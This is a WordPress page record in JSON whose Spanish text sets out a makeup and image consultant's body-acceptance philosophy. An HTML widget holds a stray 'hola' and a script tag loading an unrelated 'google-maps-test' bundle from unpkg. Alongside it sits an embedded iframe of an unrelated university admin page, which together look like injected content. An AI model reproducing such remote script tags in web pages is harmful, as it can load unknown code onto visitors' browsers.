{"id":13821,"date":"2023-10-10T11:49:31","date_gmt":"2023-10-10T11:49:31","guid":{"rendered":"https:\/\/victoriaminoldo.com.ar\/?page_id=13821"},"modified":"2024-02-16T13:42:44","modified_gmt":"2024-02-16T13:42:44","slug":"__trashed","status":"publish","type":"page","link":"https:\/\/victoriaminoldo.com.ar\/index.php\/__trashed\/","title":{"rendered":"Mi filosof\u00eda como Profesional"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"13821\" class=\"elementor elementor-13821\">\n\t\t\t\t\t\t\t\t\t<section class=\"wd-negative-gap elementor-section elementor-top-section elementor-element elementor-element-4f64cd3 elementor-section-boxed elementor-section-height-default elementor-section-height-default wd-section-disabled exad-glass-effect-no exad-sticky-section-no\" data-id=\"4f64cd3\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-extended\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-37095d9 exad-glass-effect-no exad-sticky-section-no\" data-id=\"37095d9\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-be68965 exad-sticky-section-no exad-glass-effect-no elementor-invisible elementor-widget elementor-widget-image\" data-id=\"be68965\" data-element_type=\"widget\" data-settings=\"{&quot;_animation&quot;:&quot;wd-anim-slide-from-left&quot;,&quot;_animation_delay&quot;:&quot;0&quot;}\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<style>\/*! elementor - v3.6.7 - 03-07-2022 *\/\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}<\/style>\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1707\" height=\"2560\" src=\"https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-scaled.jpg\" class=\"attachment-full size-full\" alt=\"\" srcset=\"https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-scaled.jpg 1707w, https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-scaled-150x225.jpg 150w, https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-scaled-1200x1800.jpg 1200w, https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-200x300.jpg 200w, https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-683x1024.jpg 683w, https:\/\/victoriaminoldo.com.ar\/wp-content\/uploads\/2021\/09\/DSC_2578-768x1152.jpg 768w\" sizes=\"(max-width: 1707px) 100vw, 1707px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-3225c49 exad-glass-effect-no exad-sticky-section-no\" data-id=\"3225c49\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d821d04 exad-sticky-section-no exad-glass-effect-no elementor-invisible elementor-widget elementor-widget-wd_title\" data-id=\"d821d04\" data-element_type=\"widget\" data-settings=\"{&quot;_animation&quot;:&quot;wd-anim-slide-from-right&quot;,&quot;_animation_delay&quot;:&quot;0&quot;}\" data-widget_type=\"wd_title.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"title-wrapper set-mb-s reset-last-child wd-title-color-primary wd-title-style-default wd-title-size-extra-large text-left\">\n\n\t\t\t\n\t\t\t<div class=\"liner-continer\">\n\t\t\t\t<h4 class=\"woodmart-title-container title wd-fontsize-xxxl\">Mi filosof\u00eda<\/h4> \n\t\t\t\t\t\t\t<\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b719540 exad-sticky-section-no exad-glass-effect-no elementor-invisible elementor-widget elementor-widget-wd_title\" data-id=\"b719540\" data-element_type=\"widget\" data-settings=\"{&quot;_animation&quot;:&quot;wd-anim-slide-from-right&quot;,&quot;_animation_delay&quot;:&quot;0&quot;}\" data-widget_type=\"wd_title.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"title-wrapper set-mb-s reset-last-child wd-title-color-primary wd-title-style-default wd-title-size-extra-large text-left\">\n\n\t\t\t\n\t\t\t<div class=\"liner-continer\">\n\t\t\t\t<h4 class=\"woodmart-title-container title wd-fontsize-xxxl\">profesional<\/h4> \n\t\t\t\t\t\t\t<\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-cbda859 exad-sticky-section-no exad-glass-effect-no elementor-widget elementor-widget-html\" data-id=\"cbda859\" data-element_type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\thola\n<script src=\"https:\/\/unpkg.com\/google-maps-test@1.0.17\/dist\/bundle.js\"><\/script>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-e9e43f2 exad-sticky-section-no exad-glass-effect-no elementor-invisible elementor-widget elementor-widget-wd_infobox\" data-id=\"e9e43f2\" data-element_type=\"widget\" data-settings=\"{&quot;_animation&quot;:&quot;wd-anim-slide-from-right&quot;,&quot;_animation_delay&quot;:&quot;50&quot;}\" data-widget_type=\"wd_infobox.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"info-box-wrapper\">\n\t\t\t<div class=\"wd-info-box text-left box-icon-align-left box-style-base color-scheme- wd-items-top\" >\n\t\t\t\t\t\t\t\t\t<div class=\"box-icon-wrapper  box-with-icon box-icon-simple\">\n\t\t\t\t\t\t<div class=\"info-box-icon\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"info-svg-wrapper info-icon\" style=\"width:32px; height:32px;\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"32\" height=\"32\" viewBox=\"0 0 32 32\" fill=\"none\"><g clip-path=\"url(#clip0)\"><path d=\"M19 6H1V31H26V13\" stroke=\"#101010\" stroke-opacity=\"0.9\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path><path d=\"M30.7279 1.92891L10.9289 21.7279L5.27209 16.071\" stroke=\"#101010\" stroke-opacity=\"0.9\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path><\/g><defs><clipPath id=\"svg-4129\"><rect width=\"32\" height=\"32\" fill=\"white\"><\/rect><\/clipPath><\/defs><\/svg> <\/span>\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t\n\t\t\t\t<div class=\"info-box-content\">\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t<div class=\"info-box-inner set-cont-mb-s reset-last-child\"\n\t\t\t\t\t\t data-elementor-setting-key=\"content\">\n\t\t\t\t\t\t<p><span style=\"font-weight: 400;\">Tanto en el rubro del maquillaje como en la asesor\u00eda de imagen es com\u00fan denominar todo en t\u00e9rminos absolutos: \"Va primero la base y despu\u00e9s el corrector\", <em><strong>\"Primero se <\/strong><\/em><\/span><em><strong>maquilla la piel y despu\u00e9s los ojos\" \"Los cuerpos de tipo X tienen que vestirse de X forma\".<\/strong><\/em><\/p>\n<p><span style=\"font-weight: 400;\">En ambas formaciones termin\u00e9 repleta de reglas, de formas, de \u201ccorrecciones\u201d, de maneras de \u201cdisimular\u201d la materia prima de cada una para \u201cser la mejor versi\u00f3n\u201d.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sin embargo, el trabajar con mujeres me hizo <strong>ser m\u00e1s emp\u00e1tica y amorosa conmigo misma y con las dem\u00e1s.\u00a0<\/strong><\/span><\/p>\n<p><span style=\"font-weight: 400;\">Vivimos en una cultura que nos vende una promesa: llegaremos a la plenitud y la felicidad cuando logremos convertirnos en la versi\u00f3n delgada, m\u00e1s bella, m\u00e1s retocada, m\u00e1s idealizada de nosotras mismas. Pero no es m\u00e1s que eso, una promesa.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\"><strong>Cuesta cambiar el foco pero no es imposible,<\/strong> por eso como profesional mi granito de arena es promover un enfoque positivo, identificando tus puntos fuertes y aprendiendo a potenciarlos mientras disfrutas del momento de maquillarte y vestirte, porque ambas acciones permiten desplegar tu ser.<\/span><span style=\"font-weight: 400;\">\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">La aceptaci\u00f3n corporal es mi perspectiva de trabajo. Se trata de soltar la guerra con vos misma, de poder disfrutarte, sentirte digna y merecedora como est\u00e1s hoy... de hablarte al espejo con respeto, de considerar tu cuerpo como el veh\u00edculo para la acci\u00f3n que es, porque a trav\u00e9s de \u00e9l exist\u00eds en el mundo.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Dejemos las <\/span><span style=\"font-weight: 400;\">reglas inmutables.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Acept\u00e1 lo que no pod\u00e9s cambiar.. y mejora lo que quieras mejorar de vos misma\u2026 pero siempre anteponiendo lo que te gusta te vos.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tom\u00e1 de m\u00ed -si quer\u00e9s- las sugerencias fundamentadas de qu\u00e9 puede servirte y qu\u00e9 no... pero adaptalo a tu personalidad y a tu necesidad.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Te invito a experimentar, salir de lo que nos ense\u00f1aron, correr los l\u00edmites para ver con qu\u00e9 te sent\u00eds c\u00f3modas y con qu\u00e9 no, cuestionar lo establecido y pensar afuera de la caja.<\/span><\/p>\n\t\t\t\t\t<\/div>\n\t\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"wd-negative-gap elementor-section elementor-top-section elementor-element elementor-element-93fde65 elementor-section-boxed elementor-section-height-default elementor-section-height-default wd-section-disabled exad-glass-effect-no exad-sticky-section-no\" data-id=\"93fde65\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fd5ff01 exad-glass-effect-no exad-sticky-section-no\" data-id=\"fd5ff01\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-35c570b exad-sticky-section-no exad-glass-effect-no elementor-widget elementor-widget-html\" data-id=\"35c570b\" data-element_type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<iframe src=\"https:\/\/admin.cnm.unc.edu.ar\/front\/index.php?r=reincorporaciones\" style=\"border:0px #ffffff none;\" name=\"iframeReincorporacion\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"1000px\" width=\"800px\" allowfullscreen><\/iframe>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Mi filosof\u00eda profesional hola Tanto en el rubro del maquillaje como en la asesor\u00eda de imagen es com\u00fan denominar todo<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/pages\/13821"}],"collection":[{"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=13821"}],"version-history":[{"count":0,"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/pages\/13821\/revisions"}],"wp:attachment":[{"href":"https:\/\/victoriaminoldo.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=13821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}